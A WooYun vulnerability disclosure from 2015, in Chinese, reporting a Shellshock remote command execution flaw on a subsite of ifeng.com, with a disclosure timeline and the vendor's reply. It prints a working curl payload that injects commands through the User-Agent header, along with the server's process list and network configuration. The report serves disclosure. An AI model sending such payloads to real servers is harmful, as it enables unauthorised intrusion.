当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109492

漏洞标题:凤凰网某分站远程命令执行漏洞可shell入内网

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2015-04-21 20:12

修复时间:2015-06-06 09:58

公开时间:2015-06-06 09:58

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经确认,细节仅向厂商公开
2015-05-02: 细节向核心白帽子及相关领域专家公开
2015-05-12: 细节向普通白帽子公开
2015-05-22: 细节向实习白帽子公开
2015-06-06: 细节向公众公开

简要描述:

凤凰网某分站远程命令执行漏洞可shell入内网

详细说明:

shell 远程命令执行
http://hd.ifeng.com:8082/cgi-bin/test-cgi

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2014 ?        00:00:54 init [3]                  
root         2     1  0  2014 ?        00:00:06 [migration/0]
root         3     1  0  2014 ?        00:00:32 [ksoftirqd/0]
root         4     1  0  2014 ?        00:00:06 [migration/1]
root         5     1  0  2014 ?        00:00:00 [ksoftirqd/1]
root         6     1  0  2014 ?        00:00:03 [migration/2]
root         7     1  0  2014 ?        00:00:00 [ksoftirqd/2]
root         8     1  0  2014 ?        00:00:01 [migration/3]
root         9     1  0  2014 ?        00:00:00 [ksoftirqd/3]
root        10     1  0  2014 ?        00:00:01 [migration/4]
root        11     1  0  2014 ?        00:00:00 [ksoftirqd/4]
root        12     1  0  2014 ?        00:00:01 [migration/5]
root        13     1  0  2014 ?        00:00:00 [ksoftirqd/5]
root        14     1  0  2014 ?        00:00:01 [migration/6]
root        15     1  0  2014 ?        00:00:00 [ksoftirqd/6]
root        16     1  0  2014 ?        00:00:01 [migration/7]
root        17     1  0  2014 ?        00:00:00 [ksoftirqd/7]
root        18     1  0  2014 ?        00:00:04 [events/0]
root        19     1  0  2014 ?        00:00:02 [events/1]
root        20     1  0  2014 ?        00:00:02 [events/2]
root        21     1  0  2014 ?        00:00:01 [events/3]
root        22     1  0  2014 ?        00:00:02 [events/4]
root        23     1  0  2014 ?        00:00:01 [events/5]
root        24     1  0  2014 ?        00:00:01 [events/6]
root        25     1  0  2014 ?        00:00:02 [events/7]
root        26    18  0  2014 ?        00:00:00 [khelper]
root        27    18  0  2014 ?        00:00:00 [kacpid]
root        75    18  0  2014 ?        00:00:00 [kblockd/0]
root        76    18  0  2014 ?        00:00:00 [kblockd/1]
root        77    18  0  2014 ?        00:00:00 [kblockd/2]
root        78    18  0  2014 ?        00:00:00 [kblockd/3]
root        79    18  0  2014 ?        00:00:00 [kblockd/4]
root        80    18  0  2014 ?        00:00:00 [kblockd/5]
root        81    18  0  2014 ?        00:00:00 [kblockd/6]
root        82    18  0  2014 ?        00:00:00 [kblockd/7]
root        83     1  0  2014 ?        00:00:00 [khubd]
root       102     1  0  2014 ?        00:11:57 [kswapd0]
root       103    18  0  2014 ?        00:00:00 [aio/0]
root       104    18  0  2014 ?        00:00:00 [aio/1]
root       105    18  0  2014 ?        00:00:00 [aio/2]
root       106    18  0  2014 ?        00:00:00 [aio/3]
root       107    18  0  2014 ?        00:00:00 [aio/4]
root       108    18  0  2014 ?        00:00:00 [aio/5]
root       109    18  0  2014 ?        00:00:00 [aio/6]
root       110    18  0  2014 ?        00:00:00 [aio/7]
root       254     1  0  2014 ?        00:00:00 [kseriod]
nobody     327  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start
root       535     1  0  2014 ?        00:00:00 [scsi_eh_0]
root       576     1  0  2014 ?        00:29:55 [kjournald]
root      1103    19  0  2014 ?        00:00:00 [kauditd]
nobody    1671  4158  0 Apr19 ?        00:00:08 /home/abeight/apache/bin/httpd -k start
root      1840     1  0  2014 ?        00:00:00 udevd
zqma      2249     1  0  2014 ?        10:20:20 /usr/java/jdk1.5.0_14/bin/java -jar /home/zqma/smsServer/guodu/sms.jar
root      2727     1  0  2014 ?        00:00:00 [kjournald]
root      2728     1  0  2014 ?        00:06:36 [kjournald]
root      2729     1  0  2014 ?        00:02:05 [kjournald]
root      3730     1  0  2014 ?        00:25:33 syslogd -m 0
root      3734     1  0  2014 ?        00:00:00 klogd -x
root      3747     1  0  2014 ?        00:03:08 irqbalance
root      3826     1  0  2014 ?        00:00:00 /usr/sbin/acpid
root      3887     1  0  2014 ?        00:10:40 /usr/sbin/sshd
root      3900     1  0  2014 ?        00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
nobody    3910     1  0  2014 ?        00:20:01 /usr/sbin/gmond
root      3919     1  0  2014 ?        00:00:58 crond
xfs       3949     1  0  2014 ?        00:00:00 xfs -droppriv -daemon
root      3966     1  0  2014 ?        00:00:00 /usr/sbin/atd
dbus      3976     1  0  2014 ?        00:00:00 dbus-daemon-1 --system
root      3985     1  0  2014 ?        00:00:07 hald
root      4158     1  0  2014 ?        00:00:08 /home/abeight/apache/bin/httpd -k start
root      4159  4158  0  2014 ?        00:02:54 /home/abeight/apache/bin/rotatelogs /home/abeight/apache/logs/access_log.%Y-%m-%d 86400 480
daemon    4765  4842  0 Apr20 ?        00:00:01 /home/absearch/apache/bin/httpd -k start
root      4842     1  0  2014 ?        00:00:00 /home/absearch/apache/bin/httpd -k start
root      4843  4842  0  2014 ?        00:00:22 /home/absearch/apache/bin/rotatelogs /home/absearch/apache/logs/access_log.%Y-%m-%d 86400 480
daemon    4844  4842  0  2014 ?        00:00:00 /home/absearch/apache/bin/httpd -k start
absearch  4845     1  0  2014 ?        00:01:20 ./filter_svr
absearch  4848  4845 99  2014 ?        234-05:55:06 ./filter_svr
absearch  4859     1  0  2014 ?        00:01:25 ./mobile_filter_svr
absearch  4861  4859  0  2014 ?        00:04:49 ./mobile_filter_svr
zqma      4866  9559  0 Apr20 ?        00:12:26 /home/wap/apache/bin/httpd -k start
absearch  4875     1  0  2014 ?        00:01:14 ./spy_client
root      5142     1  0  2014 tty1     00:00:00 /sbin/mingetty tty1
root      5143     1  0  2014 tty2     00:00:00 /sbin/mingetty tty2
root      5144     1  0  2014 tty3     00:00:00 /sbin/mingetty tty3
root      5145     1  0  2014 tty4     00:00:00 /sbin/mingetty tty4
root      5146     1  0  2014 tty5     00:00:00 /sbin/mingetty tty5
root      5147     1  0  2014 tty6     00:00:00 /sbin/mingetty tty6
zqma      5297  9559  0 05:31 ?        00:08:40 /home/wap/apache/bin/httpd -k start
root      6158     1  0  2014 ?        00:00:00 perl /home/wap/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root      6160  6158  1  2014 ?        2-14:05:46 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1536M -XX:MaxPermSize=256m -DLOG_ROOT=/home/wap/log -Xss1m -Dresin.home=/home/wap/resin -Dserver.root=/home/wap/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 33132 -stdout /home/wap/resin/log/stdout.log -stderr /home/wap/resin/log/stderr.log
zqma      6260  9559  0 Apr20 ?        00:12:33 /home/wap/apache/bin/httpd -k start
zqma      6262  9559  0 Apr20 ?        00:12:03 /home/wap/apache/bin/httpd -k start
zqma      6263  9559  0 Apr20 ?        00:12:36 /home/wap/apache/bin/httpd -k start
nobody    6318  4158  0 Apr20 ?        00:00:03 /home/abeight/apache/bin/httpd -k start
root      7644    25  0 Mar13 ?        00:00:00 [pdflush]
zqma      8156  9559  0 Apr17 ?        00:58:09 /home/wap/apache/bin/httpd -k start
root      9287     1  0  2014 ?        00:00:00 perl /home/abeight/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root      9289  9287  0  2014 ?        1-14:12:34 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1024M -DLOG_ROOT=/home/abeight/log -Xss1m -Dresin.home=/home/abeight/resin -Dserver.root=/home/abeight/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 34614 -stdout /home/abeight/resin/log/stdout.log -stderr /home/abeight/resin/log/stderr.log
root      9559     1  0 Mar13 ?        00:00:47 /home/wap/apache/bin/httpd -k start
root      9562  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root      9563  9559  0 Mar13 ?        00:00:01 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/wapphp_log.%Y-%m-%d 86400 480
root      9564  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/mxiu_log.%Y-%m-%d 86400 480
root      9565  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/wxp_log.%Y-%m-%d 86400 480
root      9566  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/html5_log.%Y-%m-%d 86400 480
root      9567  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/access_log.%Y-%m-%d 86400 480
root      9568  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/youhui_access_log.%Y-%m-%d 86400 480
root      9576  9559  0 Mar13 ?        00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root      9577  9559  0 Mar13 ?        00:00:05 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root      9626     1  0  2014 ?        00:00:00 perl /home/client/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root      9628  9626  1  2014 ?        2-01:20:13 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1024M -DLOG_ROOT=/home/client/log -Xss1m -Dresin.home=/home/client/resin -Dserver.root=/home/client/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 34727 -stdout /home/client/resin/log/stdout.log -stderr /home/client/resin/log/stderr.log
daemon   10271  4842  0 Apr20 ?        00:00:00 /home/absearch/apache/bin/httpd -k start
root     10960     1  0  2014 ?        00:00:00 perl /home/abcloud/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root     10962 10960  0  2014 ?        14:35:56 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1536M -XX:MaxPermSize=256m -DLOG_ROOT=/home/abcloud/log -Xss1m -Dresin.home=/home/abcloud/resin -Dserver.root=/home/abcloud/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 39341 -stdout /home/abcloud/resin/log/stdout.log -stderr /home/abcloud/resin/log/stderr.log
daemon   11705  4842  0 Apr20 ?        00:00:00 /home/absearch/apache/bin/httpd -k start
zqma     12293  9559  0 Apr17 ?        00:52:12 /home/wap/apache/bin/httpd -k start
zqma     12302  9559  0 Apr17 ?        00:51:36 /home/wap/apache/bin/httpd -k start
zqma     12311  9559  0 Apr17 ?        00:52:07 /home/wap/apache/bin/httpd -k start
zqma     12337  9559  0 Apr17 ?        00:51:59 /home/wap/apache/bin/httpd -k start
lxu      15501     1  0 Apr09 ?        00:00:00 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu      15502 15501  0 Apr09 ?        00:00:33 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu      15503 15501  0 Apr09 ?        00:01:40 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu      15505 15501  0 Apr09 ?        00:01:38 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu      15506 15501  0 Apr09 ?        00:01:40 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu      15507 15501  0 Apr09 ?        00:00:00 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
root     17309     1  0 Mar14 ?        00:00:00 ha_logd: read process        
root     17310 17309  0 Mar14 ?        00:00:00 ha_logd: write process       
root     17390     1  0 Mar14 ?        00:00:01 heartbeat: master control process
nobody   17395 17390  0 Mar14 ?        00:00:00 heartbeat: FIFO reader      
nobody   17396 17390  0 Mar14 ?        00:00:00 heartbeat: write: ucast eth1
nobody   17397 17390  0 Mar14 ?        00:00:00 heartbeat: read: ucast eth1 
nobody   17398 17390  0 Mar14 ?        00:00:00 heartbeat: write: ping_group group1
nobody   17399 17390  0 Mar14 ?        00:00:02 heartbeat: read: ping_group group1
root     17683 17390  0 Mar14 ?        00:00:00 /usr/lib/heartbeat/ipfail
root     18100     1  0 Mar14 ?        01:38:55 /usr/bin/perl -w /etc/ha.d/resource.d/ldirectord start
root     22956     1  0  2014 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.pid
mysql    22990 22956  0  2014 ?        09:54:18 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
nobody   26370  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start
nobody   26829  4158  0 19:41 ?        00:00:00 /home/abeight/apache/bin/httpd -k start
absearch 27339  4875  0 Mar12 ?        00:01:23 ./spy_client
root     27393    21  0 Mar12 ?        00:00:00 [pdflush]
nobody   30155  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start
nobody   30868  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start
root     30898  3919  0 20:10 ?        00:00:00 crond
root     30901  3919  0 20:10 ?        00:00:00 crond
zqma     30905 30898  0 20:10 ?        00:00:00 [php] <defunct>
zqma     30908 30901  0 20:10 ?        00:00:00 [php] <defunct>
root     30911  3919  0 20:10 ?        00:00:00 crond
zqma     30912 30911  0 20:10 ?        00:00:00 [php] <defunct>
zqma     30914 30901  0 20:10 ?        00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
zqma     30915 30898  0 20:10 ?        00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
zqma     30916 30911  0 20:10 ?        00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
nobody   31018 30868  0 20:10 ?        00:00:00 /bin/sh /home/abeight/apache/cgi-bin/test-cgi
nobody   31019 31018  0 20:10 ?        00:00:00 /bin/ps -ef
nobody   31388  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start
nobody   32736  4158  0 Apr19 ?        00:00:09 /home/abeight/apache/bin/httpd -k start

漏洞证明:

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/sbin/ifconfig -a" -k
eth0      Link encap:Ethernet  HWaddr 00:1E:C9:AB:39:06  
          inet addr:60.28.211.168  Bcast:60.28.211.191  Mask:255.255.255.224
          inet6 addr: fe80::21e:c9ff:feab:3906/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:341276601 errors:0 dropped:9526 overruns:0 frame:0
          TX packets:4100318771 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4133950569 (3.8 GiB)  TX bytes:1787666000 (1.6 GiB)
          Interrupt:169 Memory:f4000000-f4012100 
eth0:0    Link encap:Ethernet  HWaddr 00:1E:C9:AB:39:06  
          inet addr:60.28.211.184  Bcast:60.28.211.184  Mask:255.255.255.255
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:169 Memory:f4000000-f4012100 
eth1      Link encap:Ethernet  HWaddr 00:1E:C9:AB:39:04  
          inet addr:192.168.2.25  Bcast:192.168.2.255  Mask:255.255.255.0
          inet6 addr: fe80::21e:c9ff:feab:3904/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1526075170 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1792435524 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4141413214 (3.8 GiB)  TX bytes:4217469612 (3.9 GiB)
          Interrupt:169 Memory:f8000000-f8012100 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:671302327 errors:0 dropped:0 overruns:0 frame:0
          TX packets:671302327 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:99272102 (94.6 MiB)  TX bytes:99272102 (94.6 MiB)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

修复方案:

更新补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-22 09:56

厂商回复:

非常感谢您对凤凰网信息安全的帮助,该业务是爱帮的业务,服务器和网络都是爱帮的,我们暂时联系不到相关负责人,如果可以的话,该漏洞可以在http://www.wooyun.org/corps/爱帮网那边再提交一次。谢谢。

最新状态:

暂无